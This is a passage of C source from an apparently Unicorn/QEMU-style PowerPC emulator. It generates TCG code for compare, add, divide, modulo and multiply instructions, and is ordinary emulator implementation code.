tcg_gen_trunc_tl_i32(tcg_ctx, cpu_crf[crf], cpu_so); tcg_gen_or_i32(tcg_ctx, cpu_crf[crf], cpu_crf[crf], t); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t); } static inline void gen_op_cmpi(TCGContext *tcg_ctx, TCGv arg0, target_ulong arg1, int s, int crf) { TCGv t0 = tcg_const_tl(tcg_ctx, arg1); gen_op_cmp(tcg_ctx, arg0, t0, s, crf); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_cmp32(TCGContext *tcg_ctx, TCGv arg0, TCGv arg1, int s, int crf) { TCGv t0, t1; t0 = tcg_temp_new(tcg_ctx); t1 = tcg_temp_new(tcg_ctx); if (s) { tcg_gen_ext32s_tl(tcg_ctx, t0, arg0); tcg_gen_ext32s_tl(tcg_ctx, t1, arg1); } else { tcg_gen_ext32u_tl(tcg_ctx, t0, arg0); tcg_gen_ext32u_tl(tcg_ctx, t1, arg1); } gen_op_cmp(tcg_ctx, t0, t1, s, crf); tcg_temp_free(tcg_ctx, t1); tcg_temp_free(tcg_ctx, t0); } static inline void gen_op_cmpi32(TCGContext *tcg_ctx, TCGv arg0, target_ulong arg1, int s, int crf) { TCGv t0 = tcg_const_tl(tcg_ctx, arg1); gen_op_cmp32(tcg_ctx, arg0, t0, s, crf); tcg_temp_free(tcg_ctx, t0); } static inline void gen_set_Rc0(DisasContext *ctx, TCGv reg) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (NARROW_MODE(ctx)) { gen_op_cmpi32(tcg_ctx, reg, 0, 1, 0); } else { gen_op_cmpi(tcg_ctx, reg, 0, 1, 0); } } /* cmp */ static void gen_cmp(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if ((ctx->opcode & 0x00200000) && (ctx->insns_flags & PPC_64B)) { gen_op_cmp(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], 1, crfD(ctx->opcode)); } else { gen_op_cmp32(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], 1, crfD(ctx->opcode)); } } /* cmpi */ static void gen_cmpi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if ((ctx->opcode & 0x00200000) && (ctx->insns_flags & PPC_64B)) { gen_op_cmpi(tcg_ctx, cpu_gpr[rA(ctx->opcode)], SIMM(ctx->opcode), 1, crfD(ctx->opcode)); } else { gen_op_cmpi32(tcg_ctx, cpu_gpr[rA(ctx->opcode)], SIMM(ctx->opcode), 1, crfD(ctx->opcode)); } } /* cmpl */ static void gen_cmpl(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if ((ctx->opcode & 0x00200000) && (ctx->insns_flags & PPC_64B)) { gen_op_cmp(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], 0, crfD(ctx->opcode)); } else { gen_op_cmp32(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], 0, crfD(ctx->opcode)); } } /* cmpli */ static void gen_cmpli(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if ((ctx->opcode & 0x00200000) && (ctx->insns_flags & PPC_64B)) { gen_op_cmpi(tcg_ctx, cpu_gpr[rA(ctx->opcode)], UIMM(ctx->opcode), 0, crfD(ctx->opcode)); } else { gen_op_cmpi32(tcg_ctx, cpu_gpr[rA(ctx->opcode)], UIMM(ctx->opcode), 0, crfD(ctx->opcode)); } } /* cmprb - range comparison: isupper, isaplha, islower*/ static void gen_cmprb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 src1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 src2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 src2lo = tcg_temp_new_i32(tcg_ctx); TCGv_i32 src2hi = tcg_temp_new_i32(tcg_ctx); TCGv_i32 crf = cpu_crf[crfD(ctx->opcode)]; tcg_gen_trunc_tl_i32(tcg_ctx, src1, cpu_gpr[rA(ctx->opcode)]); tcg_gen_trunc_tl_i32(tcg_ctx, src2, cpu_gpr[rB(ctx->opcode)]); tcg_gen_andi_i32(tcg_ctx, src1, src1, 0xFF); tcg_gen_ext8u_i32(tcg_ctx, src2lo, src2); tcg_gen_shri_i32(tcg_ctx, src2, src2, 8); tcg_gen_ext8u_i32(tcg_ctx, src2hi, src2); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LEU, src2lo, src2lo, src1); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LEU, src2hi, src1, src2hi); tcg_gen_and_i32(tcg_ctx, crf, src2lo, src2hi); if (ctx->opcode & 0x00200000) { tcg_gen_shri_i32(tcg_ctx, src2, src2, 8); tcg_gen_ext8u_i32(tcg_ctx, src2lo, src2); tcg_gen_shri_i32(tcg_ctx, src2, src2, 8); tcg_gen_ext8u_i32(tcg_ctx, src2hi, src2); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LEU, src2lo, src2lo, src1); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_LEU, src2hi, src1, src2hi); tcg_gen_and_i32(tcg_ctx, src2lo, src2lo, src2hi); tcg_gen_or_i32(tcg_ctx, crf, crf, src2lo); } tcg_gen_shli_i32(tcg_ctx, crf, crf, CRF_GT_BIT); tcg_temp_free_i32(tcg_ctx, src1); tcg_temp_free_i32(tcg_ctx, src2); tcg_temp_free_i32(tcg_ctx, src2lo); tcg_temp_free_i32(tcg_ctx, src2hi); } #if defined(TARGET_PPC64) /* cmpeqb */ static void gen_cmpeqb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_cmpeqb(tcg_ctx, cpu_crf[crfD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } #endif /* isel (PowerPC 2.03 specification) */ static void gen_isel(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t bi = rC(ctx->opcode); uint32_t mask = 0x08 >> (bi & 0x03); TCGv t0 = tcg_temp_new(tcg_ctx); TCGv zr; tcg_gen_extu_i32_tl(tcg_ctx, t0, cpu_crf[bi >> 2]); tcg_gen_andi_tl(tcg_ctx, t0, t0, mask); zr = tcg_const_tl(tcg_ctx, 0); tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, cpu_gpr[rD(ctx->opcode)], t0, zr, rA(ctx->opcode) ? cpu_gpr[rA(ctx->opcode)] : zr, cpu_gpr[rB(ctx->opcode)]); tcg_temp_free(tcg_ctx, zr); tcg_temp_free(tcg_ctx, t0); } /* cmpb: PowerPC 2.05 specification */ static void gen_cmpb(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_cmpb(tcg_ctx, cpu_gpr[rA(ctx->opcode)], cpu_gpr[rS(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); } /*** Integer arithmetic ***/ static inline void gen_op_arith_compute_ov(DisasContext *ctx, TCGv arg0, TCGv arg1, TCGv arg2, int sub) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); tcg_gen_xor_tl(tcg_ctx, cpu_ov, arg0, arg2); tcg_gen_xor_tl(tcg_ctx, t0, arg1, arg2); if (sub) { tcg_gen_and_tl(tcg_ctx, cpu_ov, cpu_ov, t0); } else { tcg_gen_andc_tl(tcg_ctx, cpu_ov, cpu_ov, t0); } tcg_temp_free(tcg_ctx, t0); if (NARROW_MODE(ctx)) { tcg_gen_extract_tl(tcg_ctx, cpu_ov, cpu_ov, 31, 1); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ov32, cpu_ov); } } else { if (is_isa300(ctx)) { tcg_gen_extract_tl(tcg_ctx, cpu_ov32, cpu_ov, 31, 1); } tcg_gen_extract_tl(tcg_ctx, cpu_ov, cpu_ov, TARGET_LONG_BITS - 1, 1); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); } static inline void gen_op_arith_compute_ca32(DisasContext *ctx, TCGv res, TCGv arg0, TCGv arg1, TCGv ca32, int sub) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0; if (!is_isa300(ctx)) { return; } t0 = tcg_temp_new(tcg_ctx); if (sub) { tcg_gen_eqv_tl(tcg_ctx, t0, arg0, arg1); } else { tcg_gen_xor_tl(tcg_ctx, t0, arg0, arg1); } tcg_gen_xor_tl(tcg_ctx, t0, t0, res); tcg_gen_extract_tl(tcg_ctx, ca32, t0, 32, 1); tcg_temp_free(tcg_ctx, t0); } /* Common add function */ static inline void gen_op_arith_add(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, TCGv ca, TCGv ca32, bool add_ca, bool compute_ca, bool compute_ov, bool compute_rc0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = ret; if (compute_ca || compute_ov) { t0 = tcg_temp_new(tcg_ctx); } if (compute_ca) { if (NARROW_MODE(ctx)) { /* * Caution: a non-obvious corner case of the spec is that * we must produce the *entire* 64-bit addition, but * produce the carry into bit 32. */ TCGv t1 = tcg_temp_new(tcg_ctx); tcg_gen_xor_tl(tcg_ctx, t1, arg1, arg2); /* add without carry */ tcg_gen_add_tl(tcg_ctx, t0, arg1, arg2); if (add_ca) { tcg_gen_add_tl(tcg_ctx, t0, t0, ca); } tcg_gen_xor_tl(tcg_ctx, ca, t0, t1); /* bits changed w/ carry */ tcg_temp_free(tcg_ctx, t1); tcg_gen_extract_tl(tcg_ctx, ca, ca, 32, 1); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, ca32, ca); } } else { TCGv zero = tcg_const_tl(tcg_ctx, 0); if (add_ca) { tcg_gen_add2_tl(tcg_ctx, t0, ca, arg1, zero, ca, zero); tcg_gen_add2_tl(tcg_ctx, t0, ca, t0, ca, arg2, zero); } else { tcg_gen_add2_tl(tcg_ctx, t0, ca, arg1, zero, arg2, zero); } gen_op_arith_compute_ca32(ctx, t0, arg1, arg2, ca32, 0); tcg_temp_free(tcg_ctx, zero); } } else { tcg_gen_add_tl(tcg_ctx, t0, arg1, arg2); if (add_ca) { tcg_gen_add_tl(tcg_ctx, t0, t0, ca); } } if (compute_ov) { gen_op_arith_compute_ov(ctx, t0, arg1, arg2, 0); } if (unlikely(compute_rc0)) { gen_set_Rc0(ctx, t0); } if (t0 != ret) { tcg_gen_mov_tl(tcg_ctx, ret, t0); tcg_temp_free(tcg_ctx, t0); } } /* Add functions with two operands */ #define GEN_INT_ARITH_ADD(name, opc3, ca, add_ca, compute_ca, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_add(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ ca, glue(ca, 32), \ add_ca, compute_ca, compute_ov, Rc(ctx->opcode)); \ } /* Add functions with one operand and one immediate */ #define GEN_INT_ARITH_ADD_CONST(name, opc3, const_val, ca, \ add_ca, compute_ca, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv t0 = tcg_const_tl(tcg_ctx, const_val); \ gen_op_arith_add(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], t0, \ ca, glue(ca, 32), \ add_ca, compute_ca, compute_ov, Rc(ctx->opcode)); \ tcg_temp_free(tcg_ctx, t0); \ } /* add add. addo addo. */ GEN_INT_ARITH_ADD(add, 0x08, cpu_ca, 0, 0, 0) GEN_INT_ARITH_ADD(addo, 0x18, cpu_ca, 0, 0, 1) /* addc addc. addco addco. */ GEN_INT_ARITH_ADD(addc, 0x00, cpu_ca, 0, 1, 0) GEN_INT_ARITH_ADD(addco, 0x10, cpu_ca, 0, 1, 1) /* adde adde. addeo addeo. */ GEN_INT_ARITH_ADD(adde, 0x04, cpu_ca, 1, 1, 0) GEN_INT_ARITH_ADD(addeo, 0x14, cpu_ca, 1, 1, 1) /* addme addme. addmeo addmeo. */ GEN_INT_ARITH_ADD_CONST(addme, 0x07, -1LL, cpu_ca, 1, 1, 0) GEN_INT_ARITH_ADD_CONST(addmeo, 0x17, -1LL, cpu_ca, 1, 1, 1) /* addex */ GEN_INT_ARITH_ADD(addex, 0x05, cpu_ov, 1, 1, 0); /* addze addze. addzeo addzeo.*/ GEN_INT_ARITH_ADD_CONST(addze, 0x06, 0, cpu_ca, 1, 1, 0) GEN_INT_ARITH_ADD_CONST(addzeo, 0x16, 0, cpu_ca, 1, 1, 1) /* addi */ static void gen_addi(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long simm = SIMM(ctx->opcode); if (rA(ctx->opcode) == 0) { /* li case */ tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], simm); } else { tcg_gen_addi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], simm); } } /* addic addic.*/ static inline void gen_op_addic(DisasContext *ctx, bool compute_rc0) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv c = tcg_const_tl(tcg_ctx, SIMM(ctx->opcode)); gen_op_arith_add(ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], c, cpu_ca, cpu_ca32, 0, 1, 0, compute_rc0); tcg_temp_free(tcg_ctx, c); } static void gen_addic(DisasContext *ctx) { gen_op_addic(ctx, 0); } static void gen_addic_(DisasContext *ctx) { gen_op_addic(ctx, 1); } /* addis */ static void gen_addis(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long simm = SIMM(ctx->opcode); if (rA(ctx->opcode) == 0) { /* lis case */ tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], simm << 16); } else { tcg_gen_addi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], simm << 16); } } /* addpcis */ static void gen_addpcis(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; target_long d = DX(ctx->opcode); tcg_gen_movi_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], ctx->base.pc_next + (d << 16)); } static inline void gen_op_arith_divw(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, int sign, int compute_ov) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, arg1); tcg_gen_trunc_tl_i32(tcg_ctx, t1, arg2); if (sign) { tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_i32(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_i32(tcg_ctx, t2, t2, t3); tcg_gen_movi_i32(tcg_ctx, t3, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_i32(tcg_ctx, t3, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, ret, t3); } else { tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t2, t1, 0); tcg_gen_movi_i32(tcg_ctx, t3, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_divu_i32(tcg_ctx, t3, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, ret, t3); } if (compute_ov) { tcg_gen_extu_i32_tl(tcg_ctx, cpu_ov, t2); if (is_isa300(ctx)) { tcg_gen_extu_i32_tl(tcg_ctx, cpu_ov32, t2); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, ret); } } /* Div functions */ #define GEN_INT_ARITH_DIVW(name, opc3, sign, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_divw(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ sign, compute_ov); \ } /* divwu divwu. divwuo divwuo. */ GEN_INT_ARITH_DIVW(divwu, 0x0E, 0, 0); GEN_INT_ARITH_DIVW(divwuo, 0x1E, 0, 1); /* divw divw. divwo divwo. */ GEN_INT_ARITH_DIVW(divw, 0x0F, 1, 0); GEN_INT_ARITH_DIVW(divwo, 0x1F, 1, 1); /* div[wd]eu[o][.] */ #define GEN_DIVE(name, hlpr, compute_ov) \ static void gen_##name(DisasContext *ctx) \ { \ TCGContext *tcg_ctx = ctx->uc->tcg_ctx; \ TCGv_i32 t0 = tcg_const_i32(tcg_ctx, compute_ov); \ gen_helper_##hlpr(tcg_ctx, cpu_gpr[rD(ctx->opcode)], tcg_ctx->cpu_env, \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], t0); \ tcg_temp_free_i32(tcg_ctx, t0); \ if (unlikely(Rc(ctx->opcode) != 0)) { \ gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); \ } \ } GEN_DIVE(divweu, divweu, 0); GEN_DIVE(divweuo, divweu, 1); GEN_DIVE(divwe, divwe, 0); GEN_DIVE(divweo, divwe, 1); #if defined(TARGET_PPC64) static inline void gen_op_arith_divd(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, int sign, int compute_ov) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t0, arg1); tcg_gen_mov_i64(tcg_ctx, t1, arg2); if (sign) { tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t2, t0, INT64_MIN); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_i64(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_i64(tcg_ctx, t2, t2, t3); tcg_gen_movi_i64(tcg_ctx, t3, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_div_i64(tcg_ctx, ret, t0, t1); } else { tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t2, t1, 0); tcg_gen_movi_i64(tcg_ctx, t3, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_divu_i64(tcg_ctx, ret, t0, t1); } if (compute_ov) { tcg_gen_mov_tl(tcg_ctx, cpu_ov, t2); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ov32, t2); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, ret); } } #define GEN_INT_ARITH_DIVD(name, opc3, sign, compute_ov) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_divd(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ sign, compute_ov); \ } /* divdu divdu. divduo divduo. */ GEN_INT_ARITH_DIVD(divdu, 0x0E, 0, 0); GEN_INT_ARITH_DIVD(divduo, 0x1E, 0, 1); /* divd divd. divdo divdo. */ GEN_INT_ARITH_DIVD(divd, 0x0F, 1, 0); GEN_INT_ARITH_DIVD(divdo, 0x1F, 1, 1); GEN_DIVE(divdeu, divdeu, 0); GEN_DIVE(divdeuo, divdeu, 1); GEN_DIVE(divde, divde, 0); GEN_DIVE(divdeo, divde, 1); #endif static inline void gen_op_arith_modw(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, int sign) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, arg1); tcg_gen_trunc_tl_i32(tcg_ctx, t1, arg2); if (sign) { TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t2, t0, INT_MIN); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_i32(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_i32(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_i32(tcg_ctx, t2, t2, t3); tcg_gen_movi_i32(tcg_ctx, t3, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_rem_i32(tcg_ctx, t3, t0, t1); tcg_gen_ext_i32_tl(tcg_ctx, ret, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } else { TCGv_i32 t2 = tcg_const_i32(tcg_ctx, 1); TCGv_i32 t3 = tcg_const_i32(tcg_ctx, 0); tcg_gen_movcond_i32(tcg_ctx, TCG_COND_EQ, t1, t1, t3, t2, t1); tcg_gen_remu_i32(tcg_ctx, t3, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, ret, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t3); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } #define GEN_INT_ARITH_MODW(name, opc3, sign) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_modw(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ sign); \ } GEN_INT_ARITH_MODW(moduw, 0x08, 0); GEN_INT_ARITH_MODW(modsw, 0x18, 1); #if defined(TARGET_PPC64) static inline void gen_op_arith_modd(DisasContext *ctx, TCGv ret, TCGv arg1, TCGv arg2, int sign) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_mov_i64(tcg_ctx, t0, arg1); tcg_gen_mov_i64(tcg_ctx, t1, arg2); if (sign) { TCGv_i64 t2 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t3 = tcg_temp_new_i64(tcg_ctx); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t2, t0, INT64_MIN); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t3, t1, -1); tcg_gen_and_i64(tcg_ctx, t2, t2, t3); tcg_gen_setcondi_i64(tcg_ctx, TCG_COND_EQ, t3, t1, 0); tcg_gen_or_i64(tcg_ctx, t2, t2, t3); tcg_gen_movi_i64(tcg_ctx, t3, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_NE, t1, t2, t3, t2, t1); tcg_gen_rem_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } else { TCGv_i64 t2 = tcg_const_i64(tcg_ctx, 1); TCGv_i64 t3 = tcg_const_i64(tcg_ctx, 0); tcg_gen_movcond_i64(tcg_ctx, TCG_COND_EQ, t1, t1, t3, t2, t1); tcg_gen_remu_i64(tcg_ctx, ret, t0, t1); tcg_temp_free_i64(tcg_ctx, t2); tcg_temp_free_i64(tcg_ctx, t3); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } #define GEN_INT_ARITH_MODD(name, opc3, sign) \ static void glue(gen_, name)(DisasContext *ctx) \ { \ gen_op_arith_modd(ctx, cpu_gpr[rD(ctx->opcode)], \ cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)], \ sign); \ } GEN_INT_ARITH_MODD(modud, 0x08, 0); GEN_INT_ARITH_MODD(modsd, 0x18, 1); #endif /* mulhw mulhw. */ static void gen_mulhw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_muls2_i32(tcg_ctx, t0, t1, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulhwu mulhwu. */ static void gen_mulhwu(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_mulu2_i32(tcg_ctx, t0, t1, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t1); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mullw mullw. */ static void gen_mullw(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; #if defined(TARGET_PPC64) TCGv_i64 t0, t1; t0 = tcg_temp_new_i64(tcg_ctx); t1 = tcg_temp_new_i64(tcg_ctx); tcg_gen_ext32s_tl(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_ext32s_tl(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_mul_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, t1); tcg_temp_free(tcg_ctx, t0); tcg_temp_free(tcg_ctx, t1); #else tcg_gen_mul_i32(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); #endif if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mullwo mullwo. */ static void gen_mullwo(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); tcg_gen_trunc_tl_i32(tcg_ctx, t0, cpu_gpr[rA(ctx->opcode)]); tcg_gen_trunc_tl_i32(tcg_ctx, t1, cpu_gpr[rB(ctx->opcode)]); tcg_gen_muls2_i32(tcg_ctx, t0, t1, t0, t1); #if defined(TARGET_PPC64) tcg_gen_concat_i32_i64(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0, t1); #else tcg_gen_mov_i32(tcg_ctx, cpu_gpr[rD(ctx->opcode)], t0); #endif tcg_gen_sari_i32(tcg_ctx, t0, t0, 31); tcg_gen_setcond_i32(tcg_ctx, TCG_COND_NE, t0, t0, t1); tcg_gen_extu_i32_tl(tcg_ctx, cpu_ov, t0); if (is_isa300(ctx)) { tcg_gen_mov_tl(tcg_ctx, cpu_ov32, cpu_ov); } tcg_gen_or_tl(tcg_ctx, cpu_so, cpu_so, cpu_ov); tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); if (unlikely(Rc(ctx->opcode) != 0)) { gen_set_Rc0(ctx, cpu_gpr[rD(ctx->opcode)]); } } /* mulli */ static void gen_mulli(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; tcg_gen_muli_tl(tcg_ctx, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], SIMM(ctx->opcode)); } #if defined(TARGET_PPC64) /* mulhd mulhd. */ static void gen_mulhd(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv lo = tcg_temp_new(tcg_ctx); tcg_gen_muls2_tl(tcg_ctx, lo, cpu_gpr[rD(ctx->opcode)], cpu_gpr[rA(ctx->opcode)], cpu_gpr[rB(ctx->opcode)]); tcg_temp_free(tcg_ctx, lo); if 